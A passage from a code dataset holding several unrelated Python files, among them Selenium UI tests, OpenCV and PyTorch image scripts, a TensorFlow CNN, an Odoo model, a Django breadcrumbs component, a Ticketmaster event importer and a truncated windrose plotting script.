pages.allsubjectspage.all_subjects_list_page import AllSubjectsListPage\nfrom framework.utils.common_utils import by_id, random_string\nfrom pages.allsubjectspage.subjects_page import SubjectsPage\nfrom pages.loginpage.login_page import LoginPage\nfrom testdata.test_data import DATA_WINNER_LOGIN_PAGE, url\nfrom tests.allsubjectstests.all_subjects_data import SUBJECT_TYPE, SUBJECT_TYPE_WHITE_SPACES, ERROR_MSG_INVALID_ENTRY, SUBJECT_TYPE_SPL_CHARS, SUBJECT_TYPE_BLANK, ERROR_MSG_EMPTY_ENTRY\nfrom tests.logintests.login_data import VALID_CREDENTIALS\n\n\n@attr('suit_1')\nclass TestSubjectsPage(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.driver = setup_driver()\n cls.login_with(VALID_CREDENTIALS)\n\n @classmethod\n def login_with(cls, credential):\n cls.driver.go_to(DATA_WINNER_LOGIN_PAGE)\n LoginPage(cls.driver).login_with(credential)\n\n @classmethod\n def tearDownClass(cls):\n teardown_driver(cls.driver)\n\n def check_pagination_size(self, subjects_page, size):\n # +1 for the select all hidden row in the beginning of the table\n self.assertTrue(size+1 >= subjects_page.number_of_rows())\n self.assertEqual(size , subjects_page.selected_page_size())\n\n\n def add_subject_type(self, entity_type):\n all_subjects_page = SubjectsPage(self.driver)\n all_subjects_page.click_add_a_subject_type_link()\n all_subjects_page.add_entity_type_with(entity_type)\n\n\n @attr('functional_test')\n def test_all_subjects_page(self):\n self.driver.go_to(url(\"/entity/subjects/clinic/\"))\n subjects_page = AllSubjectsListPage(self.driver)\n self.check_pagination_size(subjects_page, 25)\n\n subjects_page.set_page_size(10)\n self.check_pagination_size(subjects_page, 10)\n\n subjects_page.search(\"tes\")\n\n self.check_pagination_size(subjects_page, 10)\n\n sleep(1)\n for row in subjects_page.rows()[1:]:\n self.assertIn(\"tes\", row.text.lower())\n\n\n @attr('functional_test')\n def test_add_duplicate_subjectType(self):\n self.driver.go_to(url(\"/entity/subjects/\"))\n subject_type_name = SUBJECT_TYPE + random_string(3)\n self.add_subject_type(subject_type_name)\n self.validate_subject_type(subject_type_name)\n self.add_subject_type(subject_type_name)\n\n def validate_error_messages(self,subject_type_name):\n error_msg = self.driver.find(by_id(\"type_message\")).text\n self.assertEquals(error_msg, subject_type_name)\n\n @attr('functional_test')\n def test_add_invalid_subjectType(self):\n self.driver.go_to(url(\"/entity/subjects/\"))\n self.add_subject_type(SUBJECT_TYPE_WHITE_SPACES)\n self.validate_error_messages(ERROR_MSG_INVALID_ENTRY)\n self.driver.find(by_id(\"cancel_add_type\")).click()\n self.add_subject_type(SUBJECT_TYPE_SPL_CHARS)\n self.validate_error_messages(ERROR_MSG_INVALID_ENTRY)\n self.driver.find(by_id(\"cancel_add_type\")).click()\n self.add_subject_type(SUBJECT_TYPE_BLANK)\n self.validate_error_messages(ERROR_MSG_EMPTY_ENTRY)\n\n\n def validate_subject_type(self, subject_type):\n element = self.driver.find_element_by_link_text(subject_type).text\n self.assertEquals(element.lower() , subject_type.lower())\n\n\n","sub_path":"func_tests/tests/allsubjectstests/all_subjects_tests.py","file_name":"all_subjects_tests.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"613237336","text":"import cv2\nimport numpy as np\nimg = cv2.imread('image/4.png')\n#cv2.imshow('img',img)\nimg_old = img.copy()\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n#cv2.imshow('gray', img)\ngblur = cv2.GaussianBlur(img, (5, 5), 0)\n#cv2.imshow('guass', gblur)\ncanny = cv2.Canny(gblur, 150, 380)\ncv2.imshow('car-canny', canny)\n\n\n\n\nlines = cv2.HoughLinesP(canny,1,np.pi/90,30,minLineLength=60,maxLineGap=65)\n\nlines1 = lines[:,0,:]#提取为为二维\nfor x1,y1,x2,y2 in lines1[:]:\n cv2.line(img_old,(x1,y1),(x2,y2),(0,0,255),1)\n\n#cv2.imshow(\"after drawContour\", canny);\ncv2.imshow(\"source img\", img_old)\ncv2.moveWindow(\"source img\",1000,100)\ncv2.waitKey(0)","sub_path":"hs/cvFeature/bianyuan2.py","file_name":"bianyuan2.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"442403558","text":"#m = loD('data/segnet/image_list2.pkl')\n\nchannel_list = []\nfor n in m:\n rgb_target = n[2]\n channels = zeros((shape(rgb_target)[0],shape(rgb_target)[1],6),np.uint8)\n for x in range(shape(rgb_target)[0]):\n for y in range(shape(rgb_target)[1]):\n c = list(rgb_target[x,y,:])\n if c == [255,0,0]:\n channels[x,y,:] = [1,0,0,0,0,0] # 0\n elif c == [0,255,0]:\n channels[x,y,:] = [0,1,0,0,0,0] # 1\n elif c == [0,0,255]:\n channels[x,y,:] = [0,0,1,0,0,0] # 2 \n elif c == [0,255,255]:\n channels[x,y,:] = [0,0,0,1,0,0] # 3\n elif c == [127,127,127]:\n channels[x,y,:] = [0,0,0,0,1,0] # 4\n elif c == [0,0,0]:\n channels[x,y,:] = [0,0,0,0,0,1] # 5\n else:\n assert False\n if False:\n mi(rgb_target,100)\n for i in range(6):\n mi(channels[:,:,i],i)\n spause()\n raw_enter()\n channel_list.append(na(channels))\n\n\nfrom utilz.vis import *\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\n\n\nclass Net(nn.Module):\n def __init__(_):\n super().__init__()\n _.first_time = True\n _.conv0 = nn.Conv2d(3, 64, kernel_size=1, stride=1)\n _.conv1 = nn.Conv2d(64, 64, kernel_size=1, stride=1)\n _.conv2 = nn.Conv2d(64, 6, kernel_size=1, stride=1)\n _.relu = nn.ReLU(inplace=True)\n def forward(_,x):\n a = [x]\n a.append( _.conv0(a[-1]) )\n a.append( _.relu(a[-1]) )\n a.append( _.conv1(a[-1]) )\n a.append( _.relu(a[-1]) )\n a.append( _.conv2(a[-1]) )\n #a.append( _.relu(a[-1]) )\n if _.first_time:\n _.first_time = False\n for b in a:\n print(b.size())\n return a[-1]\n\n\nnet = Net()\ncriterion = nn.MSELoss()\noptimizer = optim.Adam(net.parameters(), 0.001 )\ns = 0.001\nlosses = []\nsmooth_loss = []\ntimer = Timer(6)\nwhile True:\n indx = rndint(60)\n input_ = m[indx][1]\n input_ = na([input_.transpose(2,0,1)]) \n target = channel_list[indx]\n target = na([target.transpose(2,0,1)])\n input_ = torch.from_numpy(input_).float()\n target = torch.from_numpy(target)\n\n optimizer.zero_grad()\n output = net(input_)\n loss = criterion(torch.flatten(output,1),torch.flatten(target.float(),1))\n loss.backward()\n torch.nn.utils.clip_grad_norm(net.parameters(), 1.0)\n losses.append(loss.item())\n optimizer.step()\n if timer.rcheck():\n for i in range(6):\n mi(output.detach().numpy()[0,:].transpose(1,2,0)[:,:,i],i)\n spause()\n figure('losses')\n clf()\n smooth_loss.append(sum(na(losses)/len(losses)))\n plot(smooth_loss)\n losses = []\n spause()\n\n\n\n\n\n\n\n\ndef rgb_to_channels(rgb):\n channels = zeros((shape(rgb)[0],shape(rgb)[1],6),np.uint8)\n for x in range(shape(rgb)[0]):\n for y in range(shape(rgb)[1]):\n c = list(rgb[x,y,:])\n if c == [255,0,0]:\n channels[x,y,:] = [1,0,0,0,0,0] # 0\n elif c == [0,255,0]:\n channels[x,y,:] = [0,1,0,0,0,0] # 1\n elif c == [0,0,255]:\n channels[x,y,:] = [0,0,1,0,0,0] # 2 \n elif c == [0,255,255]:\n channels[x,y,:] = [0,0,0,1,0,0] # 3\n elif c == [127,127,127]:\n channels[x,y,:] = [0,0,0,0,1,0] # 4\n elif c == [0,0,0]:\n channels[x,y,:] = [0,0,0,0,0,1] # 5\n else:\n assert False\n return channels\n\nf=h5r(opjD('dep_seg_det_data_with_flip/train_dep_seg_det_data_with_flip_bed_21.1643903997.h5py'))\nfor j in range(60,120,2):\n a=rgb_to_channels(f['seg'][j])\n mi(f['seg'][j],10);spause()\n for i in range(6):\n mi(a[:,:,i],i)\n spause()\n raw_enter()\n\n","sub_path":"V/scale_out_data/Prepare_scale_out/v9/colors_to_channels.py","file_name":"colors_to_channels.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"224357172","text":"import numpy as np\r\nimport Image as im #http://www.pythonware.com/products/pil/index.htm\r\nimg = im.open('C:\\\\Users\\\\Arvind\\\\Desktop\\\\bear2rescaled.jpg')\r\nflower = np.asarray(img)\r\nprint(flower.shape)\r\nv=flower.reshape(flower.shape[0]*flower.shape[1], flower.shape[2])\r\n#arr=['LBP0.00','LBP1.00','LBP1.50','LBP2.00','LBP2.50','LBP5.00']\r\narr=['TRBP0.00','TRBP1.00','TRBP1.50','TRBP2.00','TRBP2.50','TRBP5.00']\r\nfor arrname in arr:\r\n print(arrname)\r\n components=np.loadtxt('C:\\\\Users\\\\Arvind\\\\Desktop\\\\'+arrname+'.txt', dtype=int)\r\n components = components-1\r\n #set the component with the higher prob for the pixel at (0,0) to be 0\r\n v2 = v.copy()\r\n v2[components==0]=0\r\n flower2 = v2.reshape(flower.shape)\r\n resultImage = im.fromarray(flower2)\r\n resultImage.save('C:\\\\Users\\\\Arvind\\\\Desktop\\\\'+arrname+'_1.jpg')\r\n v3 = v.copy()\r\n v3[components==1]=0\r\n flower3 = v3.reshape(flower.shape)\r\n resultImage2 = im.fromarray(flower3)\r\n resultImage2.save('C:\\\\Users\\\\Arvind\\\\Desktop\\\\'+arrname+'_0.jpg')\r\n","sub_path":"ViewSegmentedImage.py","file_name":"ViewSegmentedImage.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"531035213","text":"import pandas as pd\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport os\n\nos.chdir('../../data')\n\ntrain = pd.read_csv('train2.csv', header=None)\ntrain_X = train.iloc[1:, :1022]\ntrain_Y = train.iloc[1:, 1022]\ntest = pd.read_csv('test2.csv', header=None)\ntest_X = test.iloc[1:, :1022]\ntest_Y = test.iloc[1:, 1022]\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\ndef conv1d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_14(x):\n return tf.nn.max_pool(x, ksize=[1, 1, 14, 1],\n strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef compute_loss(loss, v_xs, v_ys):\n return sess.run(loss, feed_dict={x: v_xs, y_: v_ys, keep_prob: 1})\n\n\nx = tf.placeholder(tf.float32, [None, 1022])\ny_ = tf.placeholder(tf.float32, [None, 1])\n\nW_conv1 = weight_variable([1, 7, 1, 10])\nb_conv1 = bias_variable([10])\n\nx_image = tf.reshape(x, [-1, 1, 1022, 1])\n\nh_conv1 = tf.nn.relu(conv1d(x_image, W_conv1) + b_conv1)\n\nW_conv2 = weight_variable([1, 2, 10, 5])\nb_conv2 = bias_variable([5])\n\nh_conv2 = tf.nn.relu(conv1d(h_conv1, W_conv2) + b_conv2)\nh_pool2 = max_pool_14(h_conv2)\n\nW_fc1 = weight_variable([73 * 5 * 14, 511])\nb_fc1 = bias_variable([511])\n\nh_pool2_flat = tf.reshape(h_pool2, [-1, 73 * 5 * 14])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n'''\nW_fc1 = weight_variable([73*5, 511])\nb_fc1 = bias_variable([511])\n\nh_pool2_flat = tf.reshape(h_pool2, [-1, 73*5])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n'''\n\nkeep_prob = tf.placeholder(tf.float32)\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\nW_fc2 = weight_variable([511, 1])\nb_fc2 = bias_variable([1])\n\ny_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2\nprediction = y_conv\n\nloss = tf.reduce_mean(tf.reduce_sum(tf.square(y_ - prediction), reduction_indices=[1]))\ntrain_step = tf.train.AdamOptimizer(1e-4).minimize(loss)\ntrain_Y = np.reshape(train_Y, [train_Y.shape[0], 1])\ntest_Y = np.reshape(test_Y, [test_Y.shape[0], 1])\n\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\nfor i in range(0, 10000):\n sess.run(train_step, feed_dict={x: train_X, y_: train_Y, keep_prob: 0.8})\n if i % 100 == 0:\n print(compute_loss(loss, test_X, test_Y))\n plt.scatter(test_Y, sess.run(prediction, feed_dict={x: test_X, y_: test_Y, keep_prob: 1}))\n plt.savefig('{0}'.format(i))\n plt.close()\n\n'''\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\nfor i in range(20000):\n if i%100 == 0:\n train_accuracy = compute_accuracy(train_X,train_Y)\n print(\"step %d, training accuracy %g\"%(i, train_accuracy))\n train_step.run(feed_dict={x: train_X, y_: train_Y, keep_prob: 0.8})\n\nprint(\"test accuracy %g\"%compute_accuracy(test_X, test_Y))\n\n'''\n","sub_path":"DrugDesign_2/Models/CNN/CNN_I.py","file_name":"CNN_I.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"41138933","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib as mpl\n\naru_water = pd.read_csv('/Users/mistral/Documents/CUBoulder/Science/Sulzer/data/Other_ERA/Aru_5500m_apr_jul_wateravailability.csv')\naru_melt = pd.read_csv('/Users/mistral/Documents/CUBoulder/Science/Sulzer/data/Other_ERA/Aru_5500m_apr_jul_melt.csv')\nfc_water = pd.read_csv('/Users/mistral/Documents/CUBoulder/Science/Sulzer/data/meteo/FC_water_apr_jul_2200m.csv')\nfc_melt = pd.read_csv('/Users/mistral/Documents/CUBoulder/Science/Sulzer/data/meteo/FC_melt_apr_jul_2200m.csv')\n\nplt.style.use('ggplot')\nfig,ax = plt.subplots(figsize = (16,10))\nmpl.rcParams['lines.linewidth'] = 1.8\nmpl.rcParams['lines.markersize'] = 8.5\nax.plot(aru_water.year, aru_water.total_water, '.-', color = 'skyblue', label = 'Aru (total)')\nax.plot(aru_melt.year, aru_melt['melt'],'.:', color = 'skyblue', label = 'Aru (from melt)')\nax.plot(fc_water.year, fc_water.total_water, '.-', color = 'grey', label = 'Flat Creek (total)')\nax.plot(fc_melt.year, fc_melt['melt'],'.:', color = 'grey', label = 'Flat Creek (from melt)')\nplt.plot([2013], [510.55928471], 'o', color = 'black', markersize = 5)\nplt.plot([2015], [285.17040509], 'o', color = 'black', markersize = 5)\nplt.plot([2016], [533.367536], 'o', color = 'steelblue', markersize = 5)\nax.tick_params('both', labelsize = 18)\nplt.xlabel('Year', fontsize = 20)\nplt.ylabel('Water availability [mm]', fontsize = 20)\nax.legend(fontsize = 16, loc = 2)\nplt.ylim([0,580])\nplt.title('Pre-detachment total liquid water availability', fontsize = 22)\nplt.text(2016.1,540, '2016', fontsize = 16, color = 'steelblue', fontweight = 'bold')\nplt.text(2015.1,290, '2015', fontsize = 16, color = 'black', fontweight = 'bold')\nplt.text(2013.2,515, '2013', fontsize = 16, color = 'black', fontweight = 'bold')\nplt.show()\n#plt.savefig('FC_and_Aru_water_availability.png')\n","sub_path":"FC_GeologyFigure4.py","file_name":"FC_GeologyFigure4.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"209201301","text":"import os, torch\nfrom evaluate.coco_eval import run_eval\nfrom network.rtpose_vgg import get_model, use_vgg\nfrom xinshuo_io import mkdir_if_missing\n# from torch import load\n\n# test_split = 'test2017'\ntest_split = 'val2014'\nimage_list_file = './evaluate/image_info_val2014_1k.txt'\nroot_dir = '/media/xinshuo/Data/Datasets/coco/'\nvis_dir = os.path.join(root_dir, test_split+'_vis'); mkdir_if_missing(vis_dir)\n\n\nmodel_dir = '/media/xinshuo/Data/models/2dcpm_pytorch/pretrained'\n\n#Notice, if you using the \nwith torch.autograd.no_grad():\n # this path is with respect to the root of the project\n weight_name = os.path.join(model_dir, 'pose_model_scratch.pth')\n state_dict = torch.load(weight_name)\n model = get_model(trunk='vgg19')\n \n model = torch.nn.DataParallel(model).cuda()\n model.load_state_dict(state_dict)\n model.eval()\n model.float()\n model = model.cuda()\n \n # The choice of image preprocessing include: 'rtpose', 'inception', 'vgg' and 'ssd'.\n # If you use the converted model from caffe, it is 'rtpose' preprocess, the model trained in \n # this repo used 'vgg' preprocess\n run_eval(coco_root=root_dir, test_split=test_split, vis_dir=vis_dir,\n image_list_txt=image_list_file, \n model=model, preprocess='vgg')\n\n\n\n# val 2014 1k, with flipping average, with multi-scale search, using offline from scratch trained model from repo\n# Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets= 20 ] = 0.614\n# Average Precision (AP) @[ IoU=0.50 | area= all | maxDets= 20 ] = 0.840 \n# Average Precision (AP) @[ IoU=0.75 | area= all | maxDets= 20 ] = 0.671\n# Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets= 20 ] = 0.624\n# Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets= 20 ] = 0.608\n# Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 20 ] = 0.656 \n# Average Recall (AR) @[ IoU=0.50 | area= all | maxDets= 20 ] = 0.852 \n# Average Recall (AR) @[ IoU=0.75 | area= all | maxDets= 20 ] = 0.704 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets= 20 ] = 0.635 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets= 20 ] = 0.697\n\n\n# val 2014 1k, with flipping average, using offline from scratch trained model from repo\n# Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets= 20 ] = 0.524\n# Average Precision (AP) @[ IoU=0.50 | area= all | maxDets= 20 ] = 0.782 \n# Average Precision (AP) @[ IoU=0.75 | area= all | maxDets= 20 ] = 0.548 \n# Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets= 20 ] = 0.482 \n# Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets= 20 ] = 0.610 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 20 ] = 0.574\n# Average Recall (AR) @[ IoU=0.50 | area= all | maxDets= 20 ] = 0.799 \n# Average Recall (AR) @[ IoU=0.75 | area= all | maxDets= 20 ] = 0.598 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets= 20 ] = 0.496 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets= 20 ] = 0.715\n\n\n# val 2014 1k, with multi-scale search, using offline from scratch trained model from repo\n# Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets= 20 ] = 0.599 \n# Average Precision (AP) @[ IoU=0.50 | area= all | maxDets= 20 ] = 0.830\n# Average Precision (AP) @[ IoU=0.75 | area= all | maxDets= 20 ] = 0.651\n# Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets= 20 ] = 0.609 \n# Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets= 20 ] = 0.592 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 20 ] = 0.640 \n# Average Recall (AR) @[ IoU=0.50 | area= all | maxDets= 20 ] = 0.845 \n# Average Recall (AR) @[ IoU=0.75 | area= all | maxDets= 20 ] = 0.685\n# Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets= 20 ] = 0.619 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets= 20 ] = 0.684 ","sub_path":"evaluate/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"265747492","text":"# -*-coding: utf-8 -*-\nfrom odoo import models, fields, api, exceptions\n\n\nclass PartnerInherit(models.Model):\n _inherit = 'res.partner'\n\n max_amount = fields.Float(string='Max Amount', digit=(16, 2))\n discount_value = fields.Float(string='Discount (%)', digit=(16, 2))\n is_competitor = fields.Boolean(default=False, string='Is a Competitor')\n district_id = fields.Many2one('res.country.district', string='District')\n count_contract = fields.Integer(computed='_compute_count_contract')\n count_project = fields.Integer(computed='_compute_count_project')\n\n def _compute_count_contract(self):\n for rec in self:\n rec.count_contract = self.env['srdc.contract'].search_count([('partner_id', '=', rec.id)])\n\n def _compute_count_project(self):\n for rec in self:\n rec.count_project = self.env['project.project'].search_count([('partner_id', '=', rec.id)])\n","sub_path":"srdc_sale/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"268307475","text":"# -*- coding: utf-8 -*-\nfrom djangoplus.ui import Component\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.http.request import QueryDict\n\n\nclass Breadcrumbs(Component):\n def __init__(self, request, view_title):\n super(Breadcrumbs, self).__init__(request)\n self.referrer = None\n if view_title:\n path = request.get_full_path()\n is_popup = 'popup=1' in path\n is_csv = 'export=csv' in path\n is_static = path.startswith('/static/')\n is_media = path.startswith('/media/')\n\n if not is_popup and not is_csv and not is_static and not is_media:\n if 'stack' not in request.session:\n request.session['stack'] = []\n stack = request.session['stack']\n\n count = 0\n index = len(stack)\n while index:\n index -= 1\n title, url = stack[index]\n if not '?' in url:\n url = '%s?' % url\n urlpath, querystring = url.split('?')\n if view_title == title:#and QueryDict(querystring) == request.GET\n count = len(stack) - index\n break\n\n while count:\n stack.pop()\n count -= 1\n\n if stack:\n title, url = stack[-1]\n request.REFERRER = url\n else:\n request.REFERRER = path\n\n stack.append((view_title, path))\n\n request.session.save()\n self.referrer = len(stack) > 1 and stack[-2][1]\n\n def __unicode__(self):\n return self.render('breadcrumbs.html')\n\n\ndef httprr(request, url, message='', error=False):\n if message:\n if error:\n messages.error(request, message, extra_tags='danger')\n else:\n messages.success(request, message, extra_tags='success')\n\n if 'popup' in request.GET:\n return HttpResponse(url)\n\n if url in ('.', '..'):\n back = abs(url == '..' and -1 or 0)\n stack = request.session.get('stack', [])\n if len(stack) >= back:\n while back:\n stack.pop()\n back -= 1\n request.session.save()\n title, url = stack[-1]\n else:\n url = request.get_full_path()\n\n if request.is_ajax():\n return HttpResponse(url)\n else:\n return HttpResponseRedirect(url)\n\n","sub_path":"ui/components/breadcrumbs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"465200904","text":"from django.utils import timezone\nfrom datetime import datetime, timedelta\nimport requests\nimport json\nimport logging\nfrom lmn.keys import keys\nimport psycopg2\nimport os\nimport urllib.parse as urlparse\n\n\ntry:\n\n url = os.environ['DATABASE_URL']\n p_url = urlparse.urlparse(url)\n dbname = p_url.path[1:]\n user = p_url.username\n password = p_url.password\n\n\n db = psycopg2.connect(database=dbname, user=user, password=password, host=p_url.hostname, port=p_url.port)\n #db = psycopg2.connect(database='lmnop', user='lmnop', password=os.environ['POSTGRES_LMNOP_USER_PASSWORD'])\n cur = db.cursor()\n\n # start the daily task of adding events to database from ticketmaster.\n base_url = 'https://app.ticketmaster.com/discovery/v2/events.json?apikey={}&startDateTime={}&endDateTime={}&stateCode=MN'\n\n key = keys['TM_KEY']\n\n # getting time and formatting it for ticketmaster.\n time = datetime.utcnow()\n start_time = time + timedelta(days=1) - timedelta(hours=5)\n final_start = start_time.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n end_time = time + timedelta(days=2) - timedelta(hours=5)\n final_end = end_time.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n print(final_start)\n print(final_end)\n\n\n url = base_url.format(key,final_start,final_end)\n\n response = requests.get(url)\n\n tm_json = response.json()\n\n #print(tm_json)\n\n\n\n show_list = dict()\n\n try:\n\n artist = tm_json[\"_embedded\"]['events']\n\n\n # Loop over json and pull relevant info.\n for entry in artist:\n for place in entry[\"_embedded\"]['venues']:\n for performer in entry[\"_embedded\"]['attractions']:\n\n artist = ''\n\n #oddly I found that not every show has a attraction name.\n try:\n artist = performer['name']\n\n except Exception as e:\n artist = entry['name']\n\n location = place['name']\n\n cur.execute('SELECT * FROM lmn_venue WHERE name=%s', (location,))\n venue_rows = cur.fetchall()\n\n if not venue_rows:\n\n city = place['city']['name']\n print(location)\n print(city)\n\n query = 'INSERT INTO lmn_venue (name,city,state) VALUES (%s,%s,%s)'\n cur.execute(query, (location, city, 'MN'))\n db.commit()\n\n day = entry[\"dates\"][\"start\"][\"localDate\"]\n time = entry[\"dates\"][\"start\"][\"localTime\"]\n\n date_time = day + \" \" + time\n\n venue_list = []\n\n venue_list.append(location)\n venue_list.append(date_time)\n\n show_list[artist] = venue_list\n\n\n #print(show_list)\n\n value_list = []\n\n # loop over created dictionary and add show/artist to database.\n for key, value in show_list.items():\n\n name = key\n value_list = show_list[key]\n location = value_list[0]\n date = value_list[1]\n print(date)\n\n cur.execute('SELECT * FROM lmn_artist WHERE name=%s', (name,))\n artist_rows = cur.fetchall()\n\n cur.execute('SELECT * FROM lmn_venue WHERE name=%s', (location,))\n venue_rows = cur.fetchall()\n\n artist_id = 0\n venue_id = 0\n\n #check if artist is in database.\n if not artist_rows:\n\n query = 'INSERT INTO lmn_artist (name) VALUES (%s)'\n cur.execute(query, (name,))\n db.commit()\n\n #need to get artist ID to enter show information.\n cur.execute('SELECT * FROM lmn_artist WHERE name=%s', (name,))\n artist_rows = cur.fetchall()\n artist_id = artist_rows[0][0]\n\n cur.execute('SELECT * FROM lmn_venue WHERE name=%s', (location,))\n venue_rows = cur.fetchall()\n venue_id = venue_rows[0][0]\n\n # print(artist_id)\n # print(venue_id)\n\n #check if show has been created.\n cur.execute('SELECT * FROM lmn_show WHERE show_date=%s AND artist_id=%s AND venue_id=%s', (date,artist_id,venue_id,))\n event_rows = cur.fetchall()\n\n if not event_rows:\n\n query = 'INSERT INTO lmn_show (show_date,artist_id,venue_id) VALUES (%s,%s,%s)'\n cur.execute(query, (date, artist_id, venue_id))\n db.commit()\n\n cur.execute('SELECT * FROM lmn_show')\n event_rows = cur.fetchall()\n\n except Exception as e:\n\n logging.exception(\"Problem!\")\n\nexcept Exception as e:\n logging.exception('problem connecting toi database.')\n","sub_path":"LMNOPproject/fetch_ticketmaster_each_day.py","file_name":"fetch_ticketmaster_each_day.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"645432093","text":"#!/usr/bin/env python\n#\n# (C) Copyright 2014 UIO.\n#\n# This software is licensed under the terms of the Apache Licence Version 2.0\n# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0. \n# \n# \n# Creation: July 2017 - Anne Fouilloux - University of Oslo\n#\n# Usage:\n#\n#./test_read.py --inputdir=$PWD\n\nimport os\nfrom optparse import OptionParser\nimport os.path\nimport glob\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport windrose as wr\nimport matplotlib.ticker as plticker\n\ndef mkdir_p(file):\n if file != \"\" and file != \".\":\n path = os.path.dirname(file)\n try:\n os.stat(path)\n except:\n os.makedirs(path)\n\ndef main():\n usage = \"\"\"usage: %prog --inputdir=input_directory [--outputdir=output_directory] \"\"\"\n\n parser = OptionParser(usage=usage)\n parser.add_option(\"-s\", \"--inputdir\", dest=\"inputdir\",\n help=\"root directory for reading input files\", metavar=\"inputdir\" )\n\n parser.add_option(\"--outputdir\", dest=\"outputdir\",\n help=\"root directory for storing output files\", metavar=\"outputdir\")\n\n (options, args) = parser.parse_args()\n\n if not options.inputdir:\n parser.error(\"Input directory where files to read are located must be specified!\")\n else:\n inputdir=options.inputdir\n\n\n if not options.outputdir:\n# if WORKDIR is defined, we will use it otherwise files \n# will be stored in the current directory\n outputdir=os.environ.get(\"WORKDIR\",\".\")\n else:\n outputdir=options.outputdir\n\n#Define which filename\n filenames = glob.glob(inputdir+\"/\"+'met_mast_w*.txt')\n np_array_list = []\n for filename in filenames:\n print(filename)\n df = pd.read_csv(filename,sep=\";\",names=['station_id','date','direction','speed']) \n df['date'] = pd.to_datetime(df['date'], errors='coerce')\n df = df.dropna(subset=['date'])\n df = df.dropna(subset=['direction'])\n df= df.dropna(subset=['speed'])\n\n np_array_list.append(df.as_matrix())\n\n comb_np_array = np.vstack(np_array_list)\n big_frame = pd.DataFrame(comb_np_array)\n\n big_frame.columns = ['station_id','date','direction','speed']\n big_frame['date']= pd.to_datetime(big_frame['date'])\n big_frame['station_id']= big_frame['station_id'].astype(str)\n big_frame['direction']= big_frame['direction'].astype('float64')\n big_frame['speed']= big_frame['speed'].astype('float64')\n big_frame.index = big_frame['date']\n del big_frame['date']\n\n\n# Calm conditions\n calm = 0.5\n\n# Remove too small wind speed values!\n big_frame=big_frame.loc[(big_frame['speed'] > calm )]\n\n w_H = big_frame.loc[big_frame['station_id'] == '18210 (506)'] \n w_B = big_frame.loc[big_frame['station_id'] == '18700 (506)'] \n\n\n plt.hist([0, 1])\n plt.close()\n\n#A quick way to create new windrose axes...\n def new_axes():\n \tfig = plt.figure(figsize=(12, 10), dpi=80, facecolor='w', edgecolor='w')\n \trect = [0.1, 